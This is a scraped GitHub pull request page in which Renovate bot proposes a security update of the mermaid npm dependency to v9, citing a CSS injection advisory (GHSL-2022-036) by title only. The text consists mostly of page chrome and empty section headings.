renovate bot force-pushed the renovate/npm-mermaid-vulnerability branch from af3de01 to ceda6dd Compare February 2, 2026 18:55

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

fix(deps): update dependency mermaid to v9 [security]#671

fix(deps): update dependency mermaid to v9 [security]#671
renovate[bot] wants to merge 1 commit intomasterfrom
renovate/npm-mermaid-vulnerability

renovate bot commented Aug 6, 2024 •

edited

Loading

Uh oh!

renovate bot commented Aug 6, 2024 •

edited

Loading

Uh oh!

socket-security bot commented Dec 4, 2025 •

edited

Loading

Uh oh!

socket-security bot commented Dec 4, 2025 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

Uh oh!

Conversation

renovate bot commented Aug 6, 2024 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

GitHub Vulnerability Alerts

Impact

Patches

Workarounds

Patches

Workarounds

References

For more information

Product

Tested Version

Details

Issue 1: Multiple CSS Injection (GHSL-2022-036)

Impact

Remediation

Release Notes

Release Notes

🚀 Features

Bug Fixes & Cleanup

Documentation

Dependecy updates

Release Notes

Release Notes

🚀 Features

Documentation

Dependecy updates

Release Notes

🐛 Bug Fixes

Release Notes

Main feature

Other changes:

Documentation updates

Dependency updates

Release Notes

Main feature

Documentation updates

Dependecy updates

Release Notes

Release Notes

Changes to the functionality

Documentation changes

Dependency updates

Uh oh!

renovate bot commented Aug 6, 2024 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

⚠️ Artifact update problem

File name: web/package-lock.json

Uh oh!

socket-security bot commented Dec 4, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

socket-security bot commented Dec 4, 2025 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

renovate bot commented Aug 6, 2024 •

edited

Loading

Issue 1: Multiple CSS Injection (`GHSL-2022-036`)

renovate bot commented Aug 6, 2024 •

edited

Loading

socket-security bot commented Dec 4, 2025 •

edited

Loading

socket-security bot commented Dec 4, 2025 •

edited

Loading